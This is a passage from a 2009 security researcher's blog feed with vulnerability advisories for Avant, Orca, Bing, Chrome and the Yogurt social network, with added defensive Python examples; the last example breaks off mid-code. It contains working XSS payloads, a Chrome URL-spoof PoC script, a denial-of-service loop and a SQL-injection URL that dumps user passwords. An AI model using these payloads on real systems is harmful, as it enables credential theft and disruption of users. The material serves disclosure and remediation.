LiveSearchSiteAuth.xml is downloaded, it contains the malicious code.<br />
<br />
#########<br />
solution:<br />
##########<br />
<br />
Vendor patch<br />
<br />
#############<br />
timeline:<br />
#############<br />
<br />
discovered: 18-jun-2009<br />
vendor notified: 07-08-2009<br />
vendor response: 07-08-2009<br />
vendor patch response: 13-08-2009<br />
disclosure: 13-08-2009<br />
<br />
<br />
################ End #####################<br />
<br />
Thnx to Microsoft Security Response Center (MSRC)<br />
http://blogs.technet.com/msrc/<br />
thnx to estrella for being my light<br />
thnx to all who day after day support me !!!<br />
--<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente...<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-30769116850961579982009-08-03T07:04:00.007-07:002009-08-12T02:01:26.938-07:00Internet explorer pwned Avant Browser###########################################<br />
Internet Explorer pwned Avant Browser via<br />
history Persistent XSS vulnerabilities<br />
Vendor URL: http://www.avantbrowser.com/<br />
Advisory: http://lostmon.blogspot.com/2009/08/internet-explorer-pwned-avant-browser.html<br />
Vendor notified: NO Exploit available: yes<br />
############################################<br />
<br />
#############<br />
description<br />
#############<br />
<br />
Avant Browser's user-friendly interface brings a new level<br />
of clarity and efficiency to your browsing experience, and<br />
frequent upgrades have steadily improved its reliability.<br />
Avant Browser is freeware. That's right. 100% Free!<br />
<br />
A vulnerability in Avant Browser that I recently discovered<br />
can be exploited via the history on IE8.<br />
<br />
Related Vuln =><br />
<br />
http://lostmon.blogspot.com/2009/07/avant-browser-browserhome-persistent.html<br />
<br />
###############<br />
version tested<br />
###############<br />
<br />
Internet Explorer 8 (on XP Home)<br />
<br />
Avant Browser 11.7 build 35<br />
<br />
#########<br />
solution:<br />
##########<br />
<br />
Update to version 11.7 build 36;<br />
it is reported and tested that it isn't<br />
vulnerable.<br />
<br />
#############<br />
timeline:<br />
#############<br />
<br />
discovered: 23-07-2009<br />
disclosure: 03-08-2009<br />
<br />
##################<br />
testing<br />
##################<br />
<br />
<br />
http://lostmon.blogspot.com/2009/07/avant-browser-browserhome-persistent.html<br />
<br />
See this related vulnerability in Avant Browser. Now let's<br />
exploit it through Explorer: we know that the history column<br />
is affected by script insertion in the dynamically generated<br />
browser:home content.<br />
<br />
If a user opens Explorer and tries to navigate to a malicious<br />
site like:<br />
http://usuarios.lycos.es/reyfuss/id.php?id="><h1>Test html injection</h1><br />
<br />
For example, if we browse this URL with Avant Browser =><br />
http://usuarios.lycos.es/reyfuss/id.php?id="><iframe src='http://www.google.com'></iframe><br />
<br />
The iframe is not executed correctly in the history; but<br />
close Avant, browse the URL with IE8 and then open<br />
Avant Browser... the iframe is now executed correctly :D<br />
<br />
Those URLs are saved in the Explorer history, and here is the<br />
vulnerability: Avant Browser uses the IE8 web history<br />
to show its own history in the browser:home history column,<br />
so open Avant Browser and the HTML is executed in the history<br />
column and in most visited sites.<br />
<br />
I don't know whether the anti-XSS filter in IE8 can protect<br />
from a script attack, but at this moment we can consider that this<br />
issue has an HTML injection condition and an attacker can insert<br />
an iframe... And this is another vector to attack Avant Browser.<br />
<br />
################ End #####################<br />
<br />
thnx to estrella for being my light<br />
thnx to Brink, who investigates with me.<br />
thnx to all who day after day support me !!!<br />
atentamente:<br />
--<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente...<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-72891066757611828422009-07-31T05:03:00.009-07:002009-08-13T02:57:37.351-07:00Orca Browser browser:home Persistent XSS vulnerability###########################################<br />
Orca Browser browser:home Persistent XSS vulnerability<br />
Vendor URL: http://www.orcabrowser.com/<br />
Advisory: http://lostmon.blogspot.com/2009/07/orca-browser-browserhome-persistent-xss.html<br />
Vendor notified: NO Exploit available: yes<br />
############################################<br />
<br />
#############<br />
description<br />
#############<br />
<br />
Orca Browser's user-friendly interface brings a new level<br />
of clarity and efficiency to your browsing experience, and<br />
frequent upgrades have steadily improved its reliability.<br />
Avant Browser is freeware. That's right. 100% Free!<br />
<br />
Orca Browser contains a flaw that allows a remote cross-site<br />
scripting attack. This flaw exists because the application does<br />
not properly validate the URL links upon submission to the<br />
bookmarks on the browser:home page.<br />
This could allow a user to create a specially crafted URL or<br />
bookmark that would execute arbitrary code in a user's browser<br />
within the trust relationship between the browser and the server<br />
when trying to load browser:home, leading to a loss of integrity.<br />
<br />
###############<br />
version tested<br />
###############<br />
<br />
Avant Browser 1.2 build 2<br />
<br />
#########<br />
solution:<br />
##########<br />
<br />
Update to version 1.2 build 3;<br />
this version addresses this vulnerability.<br />
<br />
<br />
#############<br />
timeline:<br />
#############<br />
<br />
discovered: 23-jul-2009<br />
disclosure: 30 jul 2009<br />
<br />
##################<br />
testing<br />
##################<br />
<br />
Demonstration Video => http://www.spymac.com/details/?2417793<br />
<br />
Open Orca Browser; by default the browser loads the<br />
'browser:home' page. On this page we can see three<br />
columns: 1 top sites, 2 history and 3 recent bookmarks.<br />
<br />
The bookmarks column is vulnerable to an XSS. Let's<br />
demonstrate it.<br />
I made a web page that is vulnerable to an XSS condition:<br />
<br />
<?php<br />
$cmd = $_GET['id'];<br />
echo $cmd; // reflected unescaped on purpose, for the demo<br />
?><br />
<br />
I placed an online document for the demo here =><br />
http://usuarios.lycos.es/reyfuss/id.php?id=<br />
<br />
Open Orca Browser and navigate to<br />
<br />
http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script><br />
Click on the bookmark toolbar, click on new bookmark and add this URL.<br />
<br />
Load browser:home, or close and reopen the browser; the script<br />
is executed in the bookmarks column.<br />
<br />
<br />
################ End #####################<br />
<br />
thnx to estrella for being my light<br />
thnx to Brink, who investigates with me.<br />
thnx to all who day after day support me !!!<br />
atentamente:<br />
--<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente...<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-49076605205914974972009-07-30T10:11:00.007-07:002009-08-12T02:01:48.167-07:00Avant Browser browser:home Persistent XSS vulnerabilities###########################################<br />Avant Browser browser:home Persistent XSS vulnerabilities<br />vendor url: http://www.avantbrowser.com/<br />Advisory: http://lostmon.blogspot.com/2009/07/<br />avant-browser-browserhome-persistent.html<br />vendor notified: NO exploit available: yes<br />############################################<br /><br />#############<br />description<br />#############<br /><br />Avant Browser's user-friendly interface brings a new level<br />of clarity and efficiency to your browsing experience, and<br />frequent upgrades have steadily improved its reliability.<br />Avant Browser is freeware. That's right, 100% free!<br /><br />Avant Browser contains a flaw that allows a remote cross-site<br />scripting attack. The flaw exists because the application does<br />not properly validate the URLs of entries submitted to the<br />history, bookmarks and top-sites columns of the browser:home page.<br />A user can therefore create a specially crafted URL or<br />bookmark that executes arbitrary script in the victim's browser,<br />within the trust relationship between the browser and its<br />internal browser:home page, whenever browser:home is loaded,<br />leading to a loss of integrity. Unlike a reflected XSS on a<br />web site, the payload persists in the browser's own history<br />and bookmark stores, so it fires on every start until the<br />offending entry is deleted.<br /><br />###############<br />version tested<br />###############<br /><br />Avant Browser 11.7 build 35<br /><br />#########<br />solution:<br />##########<br /><br />Update to version 11.7 build 36;<br />it is reported, and I have tested, that this<br />build is not vulnerable.<br /><br /><br />#############<br />timeline:<br />#############<br /><br />discovered: 23-jul-2009<br />disclosure: 30 jul 2009<br /><br />##################<br />testing<br />##################<br /><br />Demonstration video => http://www.spymac.com/details/?2417793<br />Open Avant Browser; by default it loads the<br />'browser:home' page. This page shows three<br />columns: 1 top sites, 2 history and 3 recent bookmarks.<br /><br />All three columns are vulnerable to XSS. Let's<br />demonstrate it in the three cases.<br />I made a web page that simply takes a parameter<br />(the page is only a carrier for the payload; the<br />injection happens in the browser, not on the server):<br /><br /><?php<br />$cmd = $_GET['id'];<br />?><br /><br />I placed an online copy for the demo here =><br />http://usuarios.lycos.es/reyfuss/id.php?id=<br /><br />Open Avant Browser and navigate to<br />http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script><br />Wait until it loads, then close the browser<br />or open the browser:home URI.<br /><br />The script is executed and two columns are affected,<br />the first (top sites) and the second (history).<br /><br />Go to the tools menu and delete the history...<br /><br />Open Avant Browser and go to<br />http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script><br /><br />Right-click, select "add bookmark" and add it.<br /><br />Load browser:home again and the XSS is executed<br />in the bookmarks column.<br /><br />So, for example, to deny access to<br />browser:home we can load =><br />http://usuarios.lycos.es/reyfuss/id.php?id="><script>window.close()</script><br />and when the browser opens and loads browser:home,<br />the script closes it.<br /><br />And to cause a denial of service we can load =><br />http://usuarios.lycos.es/reyfuss/id.php?id="><script>while(1)alert(1)</script><br /><br />################ End #####################<br /><br />Thanks to Estrella for being my light.<br />Thanks to Brink, who investigates with me.<br />Thanks to all who support me day after day!<br />Sincerely:<br />--<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente...<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
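The Orca and Avant advisories above come down to the same defect: a trusted internal page (browser:home) builds its HTML by concatenating stored URLs and titles. The following Python is an added example and is not Avant, Orca or Lostmon code. It models the start-page rendering in a few lines (render_unsafe, render_safe, SAMPLE_ENTRIES and the sample entries themselves are constructed for the example) and shows the attribute escaping and URL-scheme check that would have neutralised the advisories' payload. It goes slightly beyond the advisories by also rejecting non-http(s) targets such as a javascript: bookmark.

```python
import html
from urllib.parse import urlsplit

# Constructed sample entries. The second carries the advisories' payload,
# the third is a javascript: bookmark that escaping alone would not stop.
SAMPLE_ENTRIES = [
    {"title": "Example", "url": "http://www.example.com/"},
    {"title": "demo", "url": 'http://usuarios.lycos.es/reyfuss/id.php?id="><script>alert(1)</script>'},
    {"title": "js", "url": "javascript:alert(1)"},
]


def render_unsafe(entries):
    """Plain concatenation, as the vulnerable start pages did: the stored URL
    closes the href attribute and injects a <script> element."""
    return "".join(f'<li><a href="{e["url"]}">{e["title"]}</a></li>' for e in entries)


def safe_href(url):
    """Only http(s) URLs with a host may become links; anything else is neutralised."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return "#"
    return url


def render_safe(entries):
    """Escape every untrusted value for the attribute/text context it lands in."""
    out = []
    for e in entries:
        href = html.escape(safe_href(e["url"]), quote=True)
        title = html.escape(e["title"], quote=True)
        out.append(f'<li><a href="{href}">{title}</a></li>')
    return "".join(out)


def contains_injected_tag(markup):
    """Crude oracle for the test: is there a <script> element we never wrote?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print("unsafe:", render_unsafe(SAMPLE_ENTRIES))
    print("safe:  ", render_safe(SAMPLE_ENTRIES))
```

The fix is context-aware escaping at the point of output, not input filtering: the browser cannot know in advance which character will be dangerous in the page it builds later, so it must encode for the attribute and text contexts it writes into.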
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-44467196907230994672009-07-29T09:50:00.005-07:002009-07-31T05:13:35.779-07:00Bing.com Search engine, cache.aspx XSS###########################################<br />Bing.com Search engine, cache.aspx XSS<br />vendor url: http://www.bing.com<br />advisory: http://lostmon.blogspot.com/2009/07/<br />bingcom-search-engine-cacheaspx-xss.html<br />vendor notified: yes vendor confirmed: yes<br />###########################################<br /><br />The Bing search engine contains a flaw that allows a remote cross-site<br />scripting attack. The flaw exists because the application does not<br />properly validate the 'q' parameter upon submission to the 'cache.aspx'<br />script. This could allow an attacker to craft a URL that executes<br />arbitrary script in a user's browser within the trust relationship<br />between the browser and the server (the bing.com origin), leading to<br />a loss of integrity.<br /><br /><a href="http://www.spymac.com/upload/2009/07/29/fJwDIMgRpo.gif" target="_blank"><center><img src="http://www.spymac.com/upload/2009/07/29/fJwDIMgRpo.gif" height="250" width="400"></center></a><br><br /><a href="http://www.spymac.com/upload/2009/07/29/KWAwcolFyX.gif" target="_blank"><center><img src="http://www.spymac.com/upload/2009/07/29/KWAwcolFyX.gif" height="250" width="400"></center></a><br /><br />#########<br />solution:<br />##########<br /><br />No solution at this time,<br />but Microsoft plans to patch it<br />in the next release of the Bing code.<br /><br />#############<br />timeline:<br />#############<br /><br />discovered: 08-jun-2009<br />vendor notified: 11 jun 2009<br />vendor response: 11 jun 2009<br />vendor last response: 30 jun 2009<br />disclosure: 29 jul 2009<br /><br /><br />################ End #####################<br /><br />Thanks to Estrella for being my light.<br />Thanks to Brink, who investigates with me.<br />Thanks to all who support me day after day!<br />--<br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente...<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-14585415353226402672009-07-28T08:29:00.004-07:002009-07-28T08:37:51.371-07:00Google Chrome About:blank spoof#######################################<br />Google Chrome About:blank spoof<br />vendor url: www.google.com<br />advisory: http://lostmon.blogspot.com/2009/07/<br />google-chrome-aboutblank-spoof.html<br /><br />vendor notified: YES exploit available: YES<br />########################################<br /><br />issue :=> http://code.google.com/p/chromium/issues/detail?id=17876<br /><br /><br />Chrome Version: 2.0.172.37 (official build)<br />URLs (if applicable):<br />Other browsers tested:<br /> Add OK or FAIL after other browsers where you have tested this issue:<br /> Safari 4: FAIL<br /> Firefox 3.x: FAIL<br /> IE 7: OK<br /> IE 8: OK<br /><br />What steps will reproduce the problem?<br />1. Open the exploit page<br />2. Click the link<br />3. Look at the about:blank page<br /><br />What is the expected result?<br />An error page, or a Google search for the text.<br /><br />What happens instead?<br /><br />The opener's script writes arbitrary content into the about:blank<br />page (see the sample code), so what the window shows no longer<br />matches the URL the user was asked to open.<br /><br /><br />Please provide any additional information below.<br />
Attach a screenshot if<br />possible.<br /><br />########################<br />Sample code<br />########################<br /><br /></script><br /><br /><center><br /><h1>Chrome about:blank Spoof</h1><br /></center><br /><br />This vulnerability is based on http://www.securityfocus.com/bid/35829/ and <br />http://www.securityfocus.com/bid/35803<br />by Juan Pablo Lopez Yacubian and Michael Wood.<br /><br /><p><br /><a href='javascript:spoof()'><<h2>test Spoof !!</h2></a><br /><p><br /><br /><br /><script><br />function spoof()<br />{<br /><br />a = window.open('http://www.example.com%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br 
/>20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%<br />20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20,')<br />a.document.write('<H1>FAKE PAGE<\h1>')<br />a.document.write('<title>test</title>')<br />a.stop ();<br />}<br /></script><br />####################€nd#####################<br />thank to all Lostmon groups team<br />Thnx to estrella to be my ligth<br /><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
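The spoof relies on window.open() being handed a URL whose authority is padded with hundreds of encoded spaces, so the navigation never completes while the new window still accepts document.write() from its opener. The following Python is an added example, not part of the original post or of Chromium: it shows the kind of URL sanity check a link scanner, a mail gateway or a browser's own navigation code should apply before treating a URL as trustworthy, rejecting authorities that contain percent-encoded whitespace or that are not valid hostnames. The check_url and build_spoof_url names and the HOST_RE pattern are my assumptions; build_spoof_url reconstructs the shape of the PoC argument with shorter padding.

```python
import re
from urllib.parse import urlsplit, unquote

# RFC 1123 host name: labels of letters, digits and hyphens joined by dots.
# Assumption for this example: only DNS names are vetted, not IP literals.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*\.?$"
)


def check_url(url):
    """Return the reasons a URL should not be trusted for navigation or display.
    An empty list means it looks like an ordinary web URL."""
    problems = []
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        problems.append("non-web scheme")
    authority = parts.netloc
    # The PoC keeps '%20%20...' glued directly to the host name: no valid
    # authority contains a percent sign or any kind of whitespace.
    if "%" in authority or any(ch.isspace() for ch in unquote(authority)):
        problems.append("encoded or literal whitespace in authority")
    host = parts.hostname or ""
    if not HOST_RE.match(host):
        problems.append("authority is not a valid hostname")
    return problems


def build_spoof_url(padding=200):
    """Constructed stand-in for the PoC's window.open() argument."""
    return "http://www.example.com" + "%20" * padding + ","


if __name__ == "__main__":
    print(check_url("http://www.example.com/"))
    print(check_url(build_spoof_url()))
```

A URL that fails these checks should be refused before any window is opened for it; the unloadable URL is exactly what leaves the new window as a writable about:blank page under the opener's control.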
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-86446096147649627992009-07-08T01:21:00.007-07:002009-08-03T13:43:10.740-07:00Acknowledgments from Microsoft online services.<div style="text-align: center;"><b>Security Researcher Acknowledgments </b></div><div><div style="text-align: center;"><b>for Microsoft Online Services</b></div><div><br /><div style="text-align: justify;">The Microsoft Security Response Center (MSRC) is pleased to recognize the security researchers who have helped make Microsoft online services safer by finding and reporting security vulnerabilities. Each name listed represents an individual or company who has responsibly disclosed one or more security vulnerabilities in our online services and worked with us to remediate the issue.</div><a href="http://technet.microsoft.com/en-us/security/cc308575.aspx#0609">http://technet.microsoft.com/en-us/security/cc308575.aspx#0609</a><br /><br /></div><div>June 2009 Security Researchers<br /><br /><ul><li>Blue Moon Consulting<br />bluemoon.com.vn</li><br /><li><b>Lostmon Lords<br />lostmon.blogspot.com</b></li><br /><li>Security Team<br />dongabank.com.vn</li><br /><li>Nenad Vijatov<br />blog.vijatov.com</li></ul><br /></div><div>--</div><div><br /></div><div>thank to all Lostmon groups team</div><div>Thnx to estrella to be my ligth</div><div><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: <a href="http://lostmon.blogspot.com/">http://lostmon.blogspot.com/</a><br />Google group: <a href="http://groups.google.com/group/lostmon">http://groups.google.com/group/lostmon</a> (new)<br />--<br />La curiosidad es lo que hace mover la mente....<br /></div></div><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-50188564716610732522009-07-07T10:04:00.007-07:002009-07-10T04:30:07.091-07:00Google Chrome close() issue##############################<br />Google Chrome close() issue<br />VENDOR: http://www.google.com/chrome/<br />article = http://lostmon.blogspot.com/<br />2009/07/google-chrome-close-issue.html<br />##############################<br /><pre><br />Chrome Version: 2.0.172.33 (official build)<br /><b>URLs (if applicable):</b><br /><b>Other browsers tested:</b><br /> Safari 4: OK<br /> Firefox 3.x: OK<br /> IE 7: OK<br /> IE 8: OK<br /><br /><b>What steps will reproduce the problem?</b><br /><br />1 - Open a web page<br />2 - Navigate to another page.<br /><br />Google Chrome automatically closes the tab and, if it was<br />the only tab, closes the Chrome process.<br /><br /><b>What is the expected result?</b><br /><br />Google Chrome does not close, or prompts before closing.<br /><br /><b>What happens instead?</b><br /><br />Google Chrome closes the tab, or if it was the only tab,<br />closes the browser too, without any confirmation.<br /><br />###########<br />Abstract<br />###########<br /><br />To test all of this you need an installed web server,<br />and some patience XDD<br /><br />#############<br />test 1<br />#############<br /><br />Create a new HTML document and write in it:<br /><br /><html><body onload='close()'></body></html><br />Save it as test1.html in c:\test\ for testing.<br /><br />1.1 - Open Google Chrome and open it through the file handler, as<br /> file:///c:/test/test1.html<br /> Chrome does not close the window and nothing happens...<br /><br />1.2 - Open the file from a trusted intranet zone via<br /> http://localhost/test/test1.html or via IP<br /> http://192.168.1.100/test/test1.html<br /> Chrome does not close the window and nothing happens...<br /><br /><br />1.3 - Open the hard disk, select c:\test\test1.html, right-<br /> click and open with Google Chrome.<br /> Chrome opens and closes automatically.<br /><br />If we change to another event such as onblur or onfocus,<br />it gets interesting: if we try to use the inspector to view<br />the source code, click the body tag and then close the inspector,<br />the tab closes too. This apparently only happens when the<br />HTML document is opened as in test mode 1.3.<br /><br />So this issue apparently cannot be exploited in a remote scenario.<br /><br />###############<br />test 2<br />###############<br /><br />Create a new HTML file, write the following inside, and save it as<br />test2.html in the test folder.<br /><br /><html><br /><br /><head><br /><title>.:[-Google Chrome close() issue PoC By Lostmon-]:.</title><br /></head><br /><body><br /><script><br />// CloseCrome() is intentionally undefined: the ReferenceError lands in<br />// the catch block, which schedules a reload and then calls close().<br />try { CloseCrome(); } catch(e) {<br />setTimeout("location.reload();",20);<br />close(); }<br /></script><br /><h2>.:[-Google Chrome close() issue PoC By Lostmon-]:.</h2><br /><br /><p>Google Chrome: 2.0.172.33 (official build)<br><br />WebKit 530.5<br>V8 1.1.10.13<br><br />User Agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br><br />AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5</p><br /></body><br /><br /></html><br /><br />2.1 - Open it via the file protocol handler file:///c:/test/test2.html:<br /> Chrome does not close the window and apparently nothing happens,<br /> but if we try to navigate to another site such as www.google.com<br /> the tab closes automatically.<br /><br />2.2 - Open it from a trusted web server, http://localhost/test/test2.html<br /> or http://192.168.1.100/test/test2.html: Chrome does not close<br /> the window and apparently nothing happens; but if we try to navigate<br /> to another site such as www.google.com the tab closes automatically.<br /><br />2.3 - Open the hard disk, select c:\test\test2.html, right-<br /> click and open with Google Chrome.<br /> Chrome opens and closes automatically.<br /><br />##############<br />conclusion<br />##############<br /><br />This issue can be a vulnerability, and it can be used,<br />for example, to build malware that traps the browser at a<br />given location: if the user tries to look at the code<br />(onfocus) or tries to navigate to another site (test2.html),<br />or on some other event, the window closes without interaction.<br />If malware, a malicious web page or a browser hijacker<br />sets such a page as the default home page, this becomes a<br />denial-of-service condition.</pre><br /><br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: <a href="http://lostmon.blogspot.com/">http://lostmon.blogspot.com/</a><br />Google group: <a href="http://groups.google.com/group/lostmon">http://groups.google.com/group/lostmon</a> (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-35791209901639163462009-06-27T14:16:00.003-07:002009-06-27T14:24:52.717-07:00Patch for Yogurt writemessage.php original Parameter SQL Injection###################################<br />Patch for Yogurt writemessage.php<br />original Parameter SQL Injection<br />vendor url: http://sourceforge.net/tracker/?group_id=112452<br />####################################<br /><br />This is a manual fix for the recently discovered SQL<br />injection vulnerability in the Yogurt social network.<br /><br /><br />#########################<br />vulnerability references:<br />#########################<br /><br />http://osvdb.org/show/osvdb/55098<br />http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-2034<br />http://www.milw0rm.com/exploits/8932<br /><br />####################<br />SQL injection PoC<br />####################<br /><br />http://localhost/yogurt/system/writemessage.php?original=<br />-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,<br />6,7,8+from+users--<br /><br />###############<br />Specific vendor<br />###############<br /><br />http://sourceforge.net/tracker/?func=detail&aid=<br />2813318&group_id=112452&atid=663715<br /><br />###########<br />MANUAL FIX<br />###########<br /><br />Open writemessage.php and look for this code =><br /><br />Line 79: if (isset($_GET['original']))<br />Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" .<br />$_GET['original'], $db)<br /><br />###############<br />change<br />################<br /><br />Line 81: $rs = mysql_query("SELECT * FROM messages WHERE id=" .<br />intval($_GET['original']), $db)<br /><br />intval() is enough here because the id column is numeric: whatever<br />the attacker appends after the leading integer is discarded<br />before the query reaches MySQL. A string parameter would need a<br />prepared statement, or mysql_real_escape_string() plus quoting,<br />instead.<br /><br />####################€nd ########################<br /><br />Sincerely:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
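A runnable illustration of why the intval() change works, added here as an example and not Yogurt's code: a constructed in-memory SQLite stand-in for the messages and users tables, the vulnerable concatenation from line 81, the advisory's fix (intval() emulated by a small php_intval helper) and the parameterised query a practitioner would prefer in new code. The table contents, the three-column layout and the php_intval helper are assumptions, and the PoC's concat_ws() is replaced by SQLite's || operator.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for Yogurt's MySQL tables (simplified columns)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        CREATE TABLE messages(id INTEGER, sender TEXT, body TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO messages VALUES (7, 'alice', 'hello');
    """)
    return db


def php_intval(value):
    """Emulate PHP intval() on a string: optional sign plus leading digits, else 0."""
    m = re.match(r"\s*[+-]?\d+", value)
    return int(m.group()) if m else 0


def fetch_original_vulnerable(db, original):
    """Line 81 before the fix: the raw GET parameter is spliced into the SQL."""
    return db.execute("SELECT * FROM messages WHERE id=" + original).fetchall()


def fetch_original_intval(db, original):
    """Line 81 after the advisory's fix: only the leading integer survives."""
    return db.execute(
        "SELECT * FROM messages WHERE id=" + str(php_intval(original))
    ).fetchall()


def fetch_original_param(db, original):
    """What new code should do: validate the shape, then bind the value."""
    if not original.isdigit():
        return []
    return db.execute("SELECT * FROM messages WHERE id=?", (int(original),)).fetchall()


# The advisory's PoC adapted to this schema (3 columns, || instead of concat_ws).
PAYLOAD = "-1 union select 1,username||':'||password,3 from users--"


if __name__ == "__main__":
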